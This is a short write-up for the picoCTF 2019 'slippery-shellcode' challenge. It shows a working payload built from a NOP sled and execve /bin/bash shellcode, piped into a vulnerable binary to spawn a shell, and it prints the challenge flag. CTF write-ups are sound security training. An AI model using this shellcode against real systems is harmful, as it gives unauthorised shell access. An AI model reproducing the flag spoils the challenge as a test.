# slippery-shellcode

## Problem

> This program is a little bit more tricky. Can you spawn a shell and use that to read the flag.txt? You can find the program in /problems/slippery-shellcode\_5\_5cea4ae04c57923484bda350da9f4015 on the shell server. Source.

* [Program](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/slippery-shellcode/vuln/README.md)
* [Source](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/slippery-shellcode/vuln.c)

## Solution

1. Get some quality shellcode from [ShellStorm](http://shell-storm.org/shellcode/)
2. I used `Linux/x86 - execve(/bin/bash, [/bin/sh, -p], NULL) - 33 bytes by Jonathan Salwan` at <http://shell-storm.org/shellcode/files/shellcode-606.php>
3. The buffer is 512 bytes so buffer\_size-payload\_size=no\_op\_sled\_size: `512-33=479`
4. Create payload&#x20;

```
(python2 -c "print '\x90'*479 + '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80'" ; cat) | ./vuln
```

1. Run `cat flag.txt`

### Flag

`picoCTF{sl1pp3ry_sh311c0d3_ecc37b22}`